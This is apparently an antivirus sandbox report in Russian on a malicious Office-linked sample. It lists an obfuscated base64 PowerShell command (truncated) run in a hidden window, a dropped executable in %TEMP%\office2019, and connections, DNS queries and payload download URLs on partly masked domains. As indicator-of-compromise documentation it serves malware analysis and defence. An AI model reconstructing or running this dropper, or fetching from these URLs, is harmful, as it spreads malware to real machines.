Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3980
- %TEMP%\office2019\ben6q6ae.exe
- 'me####ndwheels.com':80
- 'ev##dijk.eu':80
- 'is##er.net':80
- 'lo###pura.com':80
- 'po###rkt.com':80
- 'po###rkt.com':443
- 'x1.#.lencr.org':80
- 'in####ero-naujok.de':80
- http://me####ndwheels.com/backup/3E/
- http://ev##dijk.eu/4fd2c798720871f16/k/
- http://is##er.net/allmyguests041/BQ/
- http://lo###pura.com/cgi-bin/P/
- http://po###rkt.com/zebra/d/
- http://x1.#.lencr.org/
- http://in####ero-naujok.de/cgi-bin/kVA/
- 'po###rkt.com':443
- DNS ASK me####ndwheels.com
- DNS ASK ev##dijk.eu
- DNS ASK is##er.net
- DNS ASK lo###pura.com
- DNS ASK po###rkt.com
- DNS ASK x1.#.lencr.org
- DNS ASK ly######rlando-villa.com
- DNS ASK in####ero-naujok.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)